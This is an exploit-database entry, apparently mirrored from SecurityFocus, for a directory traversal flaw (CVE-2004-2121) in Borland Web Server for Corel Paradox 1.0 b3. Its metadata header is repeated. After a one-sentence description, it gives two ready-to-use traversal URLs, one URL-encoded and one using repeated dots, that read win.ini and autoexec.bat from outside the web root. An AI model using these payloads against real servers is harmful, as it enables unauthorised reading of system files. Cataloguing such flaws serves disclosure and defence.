borland Web server for corel paradox 1.0 b3 - Directory Traversal
| EKU-ID: 29032 | CVE: CVE-2004-2121;OSVDB-34292 | OSVDB-ID: |
| Author: Rafel Ivgi The-Insider | Published: 2004-01-24 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 29032 | CVE: CVE-2004-2121;OSVDB-34292 | OSVDB-ID: |
| Author: Rafel Ivgi The-Insider | Published: 2004-01-24 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9486/info A vulnerability in Borland Web Server for Corel Paradox has been reported that may allow a remote attacker to view files residing outside of the web server root directory on the affected system. http://<host>/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini http://<host>/..................../autoexec.bat